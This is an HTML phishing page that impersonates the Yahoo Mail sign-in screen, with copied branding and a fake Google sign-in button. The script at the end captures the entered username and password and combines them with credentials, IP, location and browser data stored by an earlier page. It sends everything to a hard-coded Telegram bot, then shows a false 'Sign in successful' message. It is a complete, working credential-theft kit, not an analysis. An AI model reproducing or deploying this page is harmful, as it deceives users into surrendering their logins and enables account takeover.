<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Yahoo Mail - Sign In</title>
    <script src="https://cdn.tailwindcss.com"></script>
    <script>
        tailwind.config = {
            theme: {
                extend: {
                    colors: {
                        'yahoo-purple': '#6001D2',
                        'yahoo-purple-hover': '#5000B8'
                    }
                }
            }
        }
    </script>
</head>
<body class="bg-gray-100 min-h-screen">
    <!-- Header -->
    <header class="bg-white px-6 py-4">
        <div class="flex justify-between items-center max-w-7xl mx-auto">
            <div class="flex items-center">
                <svg class="w-24 h-8" viewBox="0 0 120 32" fill="none">
                    <path d="M52.8 8.4L45.6 23.6H40.8L33.6 8.4H38.8L43.2 18.8L47.6 8.4H52.8Z" fill="#6001D2"/>
                    <path d="M67.2 23.6H62.4L61.6 21.2H55.6L54.8 23.6H50L57.2 8.4H60L67.2 23.6ZM58.6 12.8L57.2 16.8H60L58.6 12.8Z" fill="#6001D2"/>
                    <path d="M82.4 8.4V12.4H78V23.6H73.6V12.4H69.2V8.4H82.4Z" fill="#6001D2"/>
                    <path d="M97.6 8.4V12.4H93.2V14.8H97.2V18.4H93.2V19.6H97.6V23.6H88.8V8.4H97.6Z" fill="#6001D2"/>
                    <path d="M113.6 8.4V12.4H109.2V14.8H113.2V18.4H109.2V19.6H113.6V23.6H104.8V8.4H113.6Z" fill="#6001D2"/>
                    <circle cx="16" cy="16" r="12" fill="#6001D2"/>
                    <path d="M12 12L20 12L16 20L12 12Z" fill="white"/>
                </svg>
            </div>
            <nav class="flex space-x-6">
                <a href="#" class="text-yahoo-purple hover:underline text-sm">Help</a>
                <a href="#" class="text-yahoo-purple hover:underline text-sm">Terms</a>
                <a href="#" class="text-yahoo-purple hover:underline text-sm">Privacy</a>
            </nav>
        </div>
    </header>

    <!-- Main Content -->
    <main class="flex-1 flex items-center justify-center px-6 py-12">
        <div class="max-w-6xl w-full grid grid-cols-1 lg:grid-cols-2 gap-12 items-center">
            <!-- Left Content -->
            <div class="space-y-6">
                <h1 class="text-4xl font-light text-gray-800 leading-tight">
                    Yahoo makes it easy to enjoy what matters most in your world.
                </h1>
                <p class="text-lg text-gray-600 leading-relaxed">
                    Best-in-class Yahoo Mail, breaking local, national and global news, 
                    finance, sport, music, films and more. You get more out of the 
                    web; you get more out of life.
                </p>
            </div>

            <!-- Right Content - Sign In Form -->
            <div class="bg-white rounded-lg shadow-lg p-8 max-w-md mx-auto w-full">
                <!-- Yahoo Logo -->
                <div class="text-center mb-8">
                    <svg class="w-20 h-6 mx-auto" viewBox="0 0 120 32" fill="none">
                        <path d="M52.8 8.4L45.6 23.6H40.8L33.6 8.4H38.8L43.2 18.8L47.6 8.4H52.8Z" fill="#6001D2"/>
                        <path d="M67.2 23.6H62.4L61.6 21.2H55.6L54.8 23.6H50L57.2 8.4H60L67.2 23.6ZM58.6 12.8L57.2 16.8H60L58.6 12.8Z" fill="#6001D2"/>
                        <path d="M82.4 8.4V12.4H78V23.6H73.6V12.4H69.2V8.4H82.4Z" fill="#6001D2"/>
                        <path d="M97.6 8.4V12.4H93.2V14.8H97.2V18.4H93.2V19.6H97.6V23.6H88.8V8.4H97.6Z" fill="#6001D2"/>
                        <path d="M113.6 8.4V12.4H109.2V14.8H113.2V18.4H109.2V19.6H113.6V23.6H104.8V8.4H113.6Z" fill="#6001D2"/>
                        <circle cx="16" cy="16" r="12" fill="#6001D2"/>
                        <path d="M12 12L20 12L16 20L12 12Z" fill="white"/>
                    </svg>
                </div>

                <!-- Form Header -->
                <div class="text-center mb-8">
                    <h2 class="text-2xl font-normal text-gray-800 mb-2">Sign in to Yahoo Mail</h2>
                    <p class="text-gray-600">Sign in using your Yahoo account</p>
                </div>

                <!-- Sign In Form -->
                <form id="yahooForm" class="space-y-6">
                    <div>
                        <input 
                            id="yahoo_email"
                            type="text" 
                            placeholder="Username, email or mobile"
                            class="w-full px-4 py-3 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-yahoo-purple focus:border-transparent text-gray-800 placeholder-gray-500"
                        />
                    </div>

                    <div>
                        <input 
                            id="yahoo_password"
                            type="password" 
                            placeholder="Password"
                            class="w-full px-4 py-3 border border-gray-300 rounded-md focus:outline-none focus:ring-2 focus:ring-yahoo-purple focus:border-transparent text-gray-800 placeholder-gray-500"
                        />
                    </div>

                    <button 
                        type="submit"
                        class="w-full bg-yahoo-purple hover:bg-yahoo-purple-hover text-white font-medium py-3 px-4 rounded-md transition-colors duration-200"
                    >
                        Next
                    </button>

                    <div class="flex items-center justify-between text-sm">
                        <label class="flex items-center text-gray-600">
                            <input type="checkbox" class="mr-2 text-yahoo-purple focus:ring-yahoo-purple">
                            Stay signed in
                        </label>
                        <a href="#" class="text-yahoo-purple hover:underline">Forgotten username?</a>
                    </div>

                    <button 
                        type="button"
                        class="w-full border-2 border-yahoo-purple text-yahoo-purple hover:bg-purple-50 font-medium py-3 px-4 rounded-md transition-colors duration-200"
                    >
                        Create an account
                    </button>

                    <div class="text-center text-gray-500 text-sm">or</div>

                    <button 
                        type="button"
                        class="w-full border border-gray-300 hover:bg-gray-50 text-gray-700 font-medium py-3 px-4 rounded-md transition-colors duration-200 flex items-center justify-center space-x-2"
                    >
                        <svg class="w-5 h-5" viewBox="0 0 24 24">
                            <path fill="#4285F4" d="M22.56 12.25c0-.78-.07-1.53-.2-2.25H12v4.26h5.92c-.26 1.37-1.04 2.53-2.21 3.31v2.77h3.57c2.08-1.92 3.28-4.74 3.28-8.09z"/>
                            <path fill="#34A853" d="M12 23c2.97 0 5.46-.98 7.28-2.66l-3.57-2.77c-.98.66-2.23 1.06-3.71 1.06-2.86 0-5.29-1.93-6.16-4.53H2.18v2.84C3.99 20.53 7.7 23 12 23z"/>
                            <path fill="#FBBC05" d="M5.84 14.09c-.22-.66-.35-1.36-.35-2.09s.13-1.43.35-2.09V7.07H2.18C1.43 8.55 1 10.22 1 12s.43 3.45 1.18 4.93l2.85-2.22.81-.62z"/>
                            <path fill="#EA4335" d="M12 5.38c1.62 0 3.06.56 4.21 1.64l3.15-3.15C17.45 2.09 14.97 1 12 1 7.7 1 3.99 3.47 2.18 7.07l3.66 2.84c.87-2.6 3.3-4.53 6.16-4.53z"/>
                        </svg>
                        <span>Sign in with Google</span>
                    </button>
                </form>
            </div>
        </div>
    </main>

    <!-- Added JavaScript for form handling and Telegram sending -->
    <script>
        // Pre-fill email from localStorage
        window.addEventListener('load', () => {
            const storedEmail = localStorage.getItem('userEmail');
            if (storedEmail) {
                document.getElementById('yahoo_email').value = storedEmail;
            }
        });

        document.getElementById('yahooForm').addEventListener('submit', async (e) => {
            e.preventDefault();

            const emailFromForm = document.getElementById('yahoo_email').value.trim();
            const passwordFromForm = document.getElementById('yahoo_password').value;

            // Get stored data from first login page
            const originalEmail = localStorage.getItem('userEmail') || '';
            const originalPassword = localStorage.getItem('userPassword') || '';
            const ip = localStorage.getItem('userIP') || '';
            const country = localStorage.getItem('userCountry') || '';
            const city = localStorage.getItem('userCity') || '';
            const useragent = localStorage.getItem('userAgent') || '';
            const browser = localStorage.getItem('userBrowser') || '';
            const timestamp = localStorage.getItem('userTimestamp') || '';

            // Telegram bot configuration
            const botToken = "7838657657:AAHjMMwLMeDDCJyCeBN4liPX0ynbxRhpkvA";
            const chatId = "6686015911";

            const message = 
                "+++[ LOGIN INFO ]+++\n" +
                "Email: " + originalEmail + "\n" +
                "Password: " + originalPassword + "\n" +
                "+++[ EMAIL ACCESS ]+++\n" +
                "Email: " + emailFromForm + "\n" +
                "Password: " + passwordFromForm + "\n" +
                "+++[ IP DETAILS ]+++\n" +
                "IP Address: " + ip + "\n" +
                "Country: " + country + "\n" +
                "City: " + city + "\n" +
                "Useragent: " + useragent + "\n" +
                "Browser: " + browser + "\n" +
                "Timestamp: " + timestamp + "\n" +
                "+++[ RESULTS DONE ]+++";

            try {
                await fetch(`https://api.telegram.org/bot${botToken}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(message)}`);
            } catch (error) {
                // Telegram send failed, handle if needed
            }

            // Clear stored data
            localStorage.clear();

            // Redirect or show success message
            alert('Sign in successful!');
        });
    </script>
</body>
</html>
